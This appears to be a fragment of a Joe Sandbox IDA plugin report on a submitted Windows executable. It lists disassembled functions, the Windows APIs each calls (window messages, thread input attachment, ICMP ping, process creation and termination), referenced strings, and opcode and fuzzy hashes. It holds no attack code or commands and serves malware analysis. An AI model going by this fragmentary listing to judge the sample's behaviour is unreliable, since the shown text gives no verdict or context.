                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                        • API String ID: 2820617543-1000479233
                                        • Opcode ID: 632b63cdc5478904f3dd71ea8455c5624370b05433e470f6c7b61be0043a4994
                                        • Instruction ID: cbe5dbe95e006a68367ddd03723550236ecf9a23ad4d3d3d808e480bbeadb0d4
                                        • Opcode Fuzzy Hash: 632b63cdc5478904f3dd71ea8455c5624370b05433e470f6c7b61be0043a4994
                                        • Instruction Fuzzy Hash: BD51AF311083459BC714EF15C881AAAB7E5EF85314F18682DF49ABB2A2DB31ED49CB53
                                        Similarity
                                        • API ID: __i64tow__itow__swprintf
                                        • String ID: %.15g$0x%p$False$True
                                        • API String ID: 421087845-2263619337
                                        • Opcode ID: 6f95c34340dd586ad5a9076d1fb77842d5217a5c9958e6921cada13b2fdf9273
                                        • Instruction ID: f84bb826110476b03327f31be0779ef63cf84629bd4c647fbd30b0d0add98501
                                        • Opcode Fuzzy Hash: 6f95c34340dd586ad5a9076d1fb77842d5217a5c9958e6921cada13b2fdf9273
                                        • Instruction Fuzzy Hash: 01411631A04205AEDB24EB78DC41EB773E8EF89314F2454AEF54DF6292EA71E8418711
                                        APIs
                                        • _memset.LIBCMT ref: 00F073D9
                                        • CreateMenu.USER32 ref: 00F073F4
                                        • SetMenu.USER32(?,00000000), ref: 00F07403
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F07490
                                        • IsMenu.USER32(?), ref: 00F074A6
                                        • CreatePopupMenu.USER32 ref: 00F074B0
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F074DD
                                        • DrawMenuBar.USER32 ref: 00F074E5
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                        • String ID: 0$F
                                        • API String ID: 176399719-3044882817
                                        • Opcode ID: 0f5ca80343672d47ffb889bf133490814ebb3716d1910ecd13c39b8d03b74fef
                                        • Instruction ID: 569c6818aea54fe8a2241d5dfe664687c935887ab4f9115c5020e9632e9968d7
                                        • Opcode Fuzzy Hash: 0f5ca80343672d47ffb889bf133490814ebb3716d1910ecd13c39b8d03b74fef
                                        • Instruction Fuzzy Hash: 91413879A00349EFDB20EF64D884AAABBF5FF49310F144069FD55A73A0D731A924EB50
                                        APIs
                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F077CD
                                        • CreateCompatibleDC.GDI32(00000000), ref: 00F077D4
                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F077E7
                                        • SelectObject.GDI32(00000000,00000000), ref: 00F077EF
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F077FA
                                        • DeleteDC.GDI32(00000000), ref: 00F07803
                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F0780D
                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F07821
                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F0782D
                                        Similarity
                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                        • String ID: static
                                        • API String ID: 2559357485-2160076837
                                        • Opcode ID: 02e658f63cfd3b71f0e5a1343b65e26b5f42f391d2d48572e66b37e5c7c6f48c
                                        • Instruction ID: 95bf0a261b782b1bac333b0da54dfe98d945f66b9894dbc2fbe45708a2623c1a
                                        • Opcode Fuzzy Hash: 02e658f63cfd3b71f0e5a1343b65e26b5f42f391d2d48572e66b37e5c7c6f48c
                                        • Instruction Fuzzy Hash: D3317031505219BBDF21AF64DC08FDA3BA9FF09761F114224FA15A60E0C735E825FBA4
                                        APIs
                                        • _memset.LIBCMT ref: 00EA707B
                                          • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                                        • __gmtime64_s.LIBCMT ref: 00EA7114
                                        • __gmtime64_s.LIBCMT ref: 00EA714A
                                        • __gmtime64_s.LIBCMT ref: 00EA7167
                                        • __allrem.LIBCMT ref: 00EA71BD
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA71D9
                                        • __allrem.LIBCMT ref: 00EA71F0
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA720E
                                        • __allrem.LIBCMT ref: 00EA7225
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA7243
                                        • __invoke_watson.LIBCMT ref: 00EA72B4
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                        • String ID:
                                        • API String ID: 384356119-0
                                        • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                        • Instruction ID: f0fcc78370526dcf3584963edbf503dfc98c2431918715f7d84a270982b40a75
                                        • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                        • Instruction Fuzzy Hash: 6671CAB1A04716ABD714DE79CC8179BB7E8AF1A324F14523AF554FA281E770F9408790
                                        APIs
                                        • _memset.LIBCMT ref: 00EE2A31
                                        • GetMenuItemInfoW.USER32(00F46890,000000FF,00000000,00000030), ref: 00EE2A92
                                        • SetMenuItemInfoW.USER32(00F46890,00000004,00000000,00000030), ref: 00EE2AC8
                                        • Sleep.KERNEL32(000001F4), ref: 00EE2ADA
                                        • GetMenuItemCount.USER32(?), ref: 00EE2B1E
                                        • GetMenuItemID.USER32(?,00000000), ref: 00EE2B3A
                                        • GetMenuItemID.USER32(?,-00000001), ref: 00EE2B64
                                        • GetMenuItemID.USER32(?,?), ref: 00EE2BA9
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EE2BEF
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2C03
                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2C24
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                        • String ID:
                                        • API String ID: 4176008265-0
                                        • Opcode ID: 323bff6defbabce34f2ef3312d4ca9225aaef01dfd2a3de18418741f9fe26aa1
                                        • Instruction ID: 16fc07d01070a59204a394e26ed519f3f1540654067ea62d332f4514b4048760
                                        • Opcode Fuzzy Hash: 323bff6defbabce34f2ef3312d4ca9225aaef01dfd2a3de18418741f9fe26aa1
                                        • Instruction Fuzzy Hash: A5617CB090028DAFDB21CF65CC88ABEBBBCFB41308F14556DEA41A7251D771AD45EB21
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F07214
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F07217
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F0723B
                                        • _memset.LIBCMT ref: 00F0724C
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F0725E
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F072D6
                                        Similarity
                                        • API ID: MessageSend$LongWindow_memset
                                        • String ID:
                                        • API String ID: 830647256-0
                                        • Opcode ID: 1462a9553875f48afb76b234c88f52c247f96f1677b326778094096736f2b9ee
                                        • Instruction ID: aeb64efceb8cf3a9e8579c982b9e5f0c12d3171a9fec153b459a3db09756f1a5
                                        • Opcode Fuzzy Hash: 1462a9553875f48afb76b234c88f52c247f96f1677b326778094096736f2b9ee
                                        • Instruction Fuzzy Hash: 0C613975900308AFDB20EFA4CC81EEE77F8AB09714F144199FA15E72E1D774A945EB60
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00ED7135
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00ED718E
                                        • VariantInit.OLEAUT32(?), ref: 00ED71A0
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00ED71C0
                                        • VariantCopy.OLEAUT32(?,?), ref: 00ED7213
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00ED7227
                                        • VariantClear.OLEAUT32(?), ref: 00ED723C
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00ED7249
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ED7252
                                        • VariantClear.OLEAUT32(?), ref: 00ED7264
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ED726F
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 45290da3dae0fd8dbbf932717d8d9457ff8bd360a0e4543f8fb5e19dce8bc56e
                                        • Instruction ID: 5b94f6944a0e2c81bdf778cca14ad79ce52db088b75ef12a964bca18d34103fd
                                        • Opcode Fuzzy Hash: 45290da3dae0fd8dbbf932717d8d9457ff8bd360a0e4543f8fb5e19dce8bc56e
                                        • Instruction Fuzzy Hash: 5F415075904219AFCF14DFA4DC849AEBBB8FF08354F00906AF955E7761DB30A946CB90
                                        Similarity
                                        • API ID: Variant$ClearInit$_memset
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                        • API String ID: 2862541840-1765764032
                                        • Opcode ID: 86784cfa05b41c6e6344222a1375ccf81d7e85acc8baf77c98b11a648907f450
                                        • Instruction ID: f2e949e68bace125e4eb3edeb9858172a41295ede709dfc1a0a9f23206e3093f
                                        • Opcode Fuzzy Hash: 86784cfa05b41c6e6344222a1375ccf81d7e85acc8baf77c98b11a648907f450
                                        • Instruction Fuzzy Hash: C791DE70A00219ABDF24DFA5C884FAEB7B8EF85314F109059F655FB282D7709905CFA0
                                        APIs
                                        • WSAStartup.WS2_32(00000101,?), ref: 00EF5AA6
                                        • inet_addr.WS2_32(?), ref: 00EF5AEB
                                        • gethostbyname.WS2_32(?), ref: 00EF5AF7
                                        • IcmpCreateFile.IPHLPAPI ref: 00EF5B05
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF5B75
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF5B8B
                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EF5C00
                                        • WSACleanup.WS2_32 ref: 00EF5C06
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        Strings
                                        • argument not compiled in 16 bit mode, xrefs: 00ED1150
                                        • failed to get memory, xrefs: 00E96488
                                        • ERCP, xrefs: 00E96313
                                        • argument is not a compiled regular expression, xrefs: 00ED1160
                                        • internal error: opcode not recognized, xrefs: 00E9647D
                                        • internal error: missing capturing bracket, xrefs: 00ED1158
                                        Similarity
                                        • API ID: _memset$_memmove
                                        • String ID: ERCP$argument is not a compiled regular expression$argument not compiled in 16 bit mode$failed to get memory$internal error: missing capturing bracket$internal error: opcode not recognized
                                        • API String ID: 2532777613-264027815
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00EEB73B
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EEB7B1
                                        • GetLastError.KERNEL32 ref: 00EEB7BB
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00EEB828
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00ED94F6
                                        • GetDlgCtrlID.USER32 ref: 00ED9501
                                        • GetParent.USER32 ref: 00ED951D
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ED9520
                                        • GetDlgCtrlID.USER32(?), ref: 00ED9529
                                        • GetParent.USER32(?), ref: 00ED9545
                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ED9548
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 1536045017-1403004172
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00ED95DF
                                        • GetDlgCtrlID.USER32 ref: 00ED95EA
                                        • GetParent.USER32 ref: 00ED9606
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ED9609
                                        • GetDlgCtrlID.USER32(?), ref: 00ED9612
                                        • GetParent.USER32(?), ref: 00ED962E
                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ED9631
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 1536045017-1403004172
                                        APIs
                                        • GetParent.USER32 ref: 00ED9651
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00ED9666
                                        • _wcscmp.LIBCMT ref: 00ED9678
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00ED96F3
                                        Similarity
                                        • API ID: ClassMessageNameParentSend_wcscmp
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1704125052-3381328864
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00EF8BEC
                                        • CoInitialize.OLE32(00000000), ref: 00EF8C19
                                        • CoUninitialize.COMBASE ref: 00EF8C23
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00EF8D23
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EF8E50
                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,00F12C0C), ref: 00EF8E84
                                        • CoGetObject.OLE32(?,00000000,00F12C0C,?), ref: 00EF8EA7
                                        • SetErrorMode.KERNEL32(00000000), ref: 00EF8EBA
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EF8F3A
                                        • VariantClear.OLEAUT32(?), ref: 00EF8F4A
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                        • String ID:
                                        • API String ID: 2395222682-0
                                        APIs
                                        • __swprintf.LIBCMT ref: 00EE419D
                                        • __swprintf.LIBCMT ref: 00EE41AA
                                          • Part of subcall function 00EA38D8: __woutput_l.LIBCMT ref: 00EA3931
                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00EE41D4
                                        • LoadResource.KERNEL32(?,00000000), ref: 00EE41E0
                                        • LockResource.KERNEL32(00000000), ref: 00EE41ED
                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00EE420D
                                        • LoadResource.KERNEL32(?,00000000), ref: 00EE421F
                                        • SizeofResource.KERNEL32(?,00000000), ref: 00EE422E
                                        • LockResource.KERNEL32(?), ref: 00EE423A
                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00EE429B
                                        Similarity
                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                        • String ID:
                                        • API String ID: 1433390588-0
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00EE1700
                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1714
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00EE171B
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE172A
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE173C
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1755
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1767
                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17AC
                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17C1
                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17CC
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E8FC06
                                        • OleUninitialize.OLE32(?,00000000), ref: 00E8FCA5
                                        • UnregisterHotKey.USER32(?), ref: 00E8FDFC
                                        • DestroyWindow.USER32(?), ref: 00EC4A00
                                        • FreeLibrary.KERNEL32(?), ref: 00EC4A65
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EC4A92
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        APIs
                                        • EnumChildWindows.USER32(?,00EDAA64), ref: 00EDA9A2
                                        Similarity
                                        • API ID: ChildEnumWindows
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 3555792229-1603158881
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 00E82EAE
                                          • Part of subcall function 00E81DB3: GetClientRect.USER32(?,?), ref: 00E81DDC
                                          • Part of subcall function 00E81DB3: GetWindowRect.USER32(?,?), ref: 00E81E1D
                                          • Part of subcall function 00E81DB3: ScreenToClient.USER32(?,?), ref: 00E81E45
                                        • GetDC.USER32 ref: 00EBCF82
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EBCF95
                                        • SelectObject.GDI32(00000000,00000000), ref: 00EBCFA3
                                        • SelectObject.GDI32(00000000,00000000), ref: 00EBCFB8
                                        • ReleaseDC.USER32(?,00000000), ref: 00EBCFC0
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EBD04B
                                        Strings
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: U
                                        • API String ID: 4009187628-3372436214
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F07093
                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F070A7
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F070C1
                                        • _wcscat.LIBCMT ref: 00F0711C
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F07133
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F07161
                                        Strings
                                        Similarity
                                        • API ID: MessageSend$Window_wcscat
                                        • String ID: -----$SysListView32
                                        • API String ID: 307300125-3975388722
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F0F910), ref: 00EF903D
                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F0F910), ref: 00EF9071
                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EF91EB
                                        • SysFreeString.OLEAUT32(?), ref: 00EF9215
                                        Similarity
                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                        • String ID:
                                        • API String ID: 560350794-0
                                        APIs
                                        • _memset.LIBCMT ref: 00EFF9C9
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFB5C
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFB80
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFBC0
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFBE2
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EFFD5E
                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EFFD90
                                        • CloseHandle.KERNEL32(?), ref: 00EFFDBF
                                        • CloseHandle.KERNEL32(?), ref: 00EFFE36
                                        Similarity
                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                        • String ID:
                                        • API String ID: 4090791747-0
                                        APIs
                                          • Part of subcall function 00E81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E82036,?,00000000,?,?,?,?,00E816CB,00000000,?), ref: 00E81B9A
                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E820D3
                                        • KillTimer.USER32(-00000001,?,?,?,?,00E816CB,00000000,?,?,00E81AE2,?,?), ref: 00E8216E
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00EBBEF6
                                        • DeleteObject.GDI32(00000000), ref: 00EBBF6C
                                        Similarity
                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 2402799130-0
                                        APIs
                                          • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EE38D3,?), ref: 00EE48C7
                                          • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EE38D3,?), ref: 00EE48E0
                                          • Part of subcall function 00EE4CD3: GetFileAttributesW.KERNEL32(?,00EE3947), ref: 00EE4CD4
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00EE4FE2
                                        • _wcscmp.LIBCMT ref: 00EE4FFC
                                        • MoveFileW.KERNEL32(?,?), ref: 00EE5017
                                        Similarity
                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                        • String ID:
                                        • API String ID: 793581249-0
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F0896E
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID:
                                        • API String ID: 634782764-0
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EBC547
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EBC569
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EBC581
                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EBC59F
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EBC5C0
                                        • DestroyCursor.USER32(00000000), ref: 00EBC5CF
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EBC5EC
                                        • DestroyCursor.USER32(?), ref: 00EBC5FB
                                          • Part of subcall function 00F0A71E: DeleteObject.GDI32(00000000), ref: 00F0A757
                                        Similarity
                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                        • String ID:
                                        • API String ID: 2975913752-0
                                        APIs
                                          • Part of subcall function 00EDAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDAE77
                                          • Part of subcall function 00EDAE57: GetCurrentThreadId.KERNEL32 ref: 00EDAE7E
                                          • Part of subcall function 00EDAE57: AttachThreadInput.USER32(00000000,?,00ED9B65,?,00000001), ref: 00EDAE85
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ED9B70
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ED9B8D
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ED9B90
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ED9B99
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ED9BB7
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ED9BBA
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ED9BC3
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ED9BDA
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ED9BDD
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E0C
                                        • RtlAllocateHeap.NTDLL(00000000,?,00ED8A84), ref: 00ED8E13
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00ED8A84,00000B00,?,?), ref: 00ED8E28
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E30
                                        • DuplicateHandle.KERNEL32(00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E33
                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00ED8A84,00000B00,?,?), ref: 00ED8E43
                                        • GetCurrentProcess.KERNEL32(00ED8A84,00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E4B
                                        • DuplicateHandle.KERNEL32(00000000,?,00ED8A84,00000B00,?,?), ref: 00ED8E4E
                                        • CreateThread.KERNEL32(00000000,00000000,00ED8E74,00000000,00000000,00000000), ref: 00ED8E68
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                        • String ID:
                                        • API String ID: 1422014791-0
                                        APIs
                                          • Part of subcall function 00ED7652: CLSIDFromProgID.COMBASE ref: 00ED766F
                                          • Part of subcall function 00ED7652: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00ED768A
                                          • Part of subcall function 00ED7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00ED758C,80070057,?,?), ref: 00ED7698
                                          • Part of subcall function 00ED7652: CoTaskMemFree.COMBASE(00000000), ref: 00ED76A8
                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00EF9B1B
                                        • _memset.LIBCMT ref: 00EF9B28
                                        • _memset.LIBCMT ref: 00EF9C6B
                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 00EF9C97
                                        • CoTaskMemFree.COMBASE(?), ref: 00EF9CA2
                                        Strings
                                        • NULL Pointer assignment, xrefs: 00EF9CF0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 1300414916-2785691316
                                        • Opcode ID: 8e5821a209676a6510d5cec38f78a87a954bcbaa4ee046fe5b9dcb12f3d670ed
                                        • Instruction ID: 18a826a68197050101f52dde879417dc89d430ecae61646dcde0543d5f8ebf2b
                                        • Opcode Fuzzy Hash: 8e5821a209676a6510d5cec38f78a87a954bcbaa4ee046fe5b9dcb12f3d670ed
                                        • Instruction Fuzzy Hash: 0E913871D0021DABDB10DFA5DC84AEEBBB8AF08710F20515AF559B7281DB319A45CFA0
                                        APIs
                                          • Part of subcall function 00EE3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00EE3EB6
                                          • Part of subcall function 00EE3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00EE3EC4
                                          • Part of subcall function 00EE3E91: CloseHandle.KERNEL32(00000000), ref: 00EE3F8E
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EFECB8
                                        • GetLastError.KERNEL32 ref: 00EFECCB
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EFECFA
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EFED77
                                        • GetLastError.KERNEL32(00000000), ref: 00EFED82
                                        • CloseHandle.KERNEL32(00000000), ref: 00EFEDB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
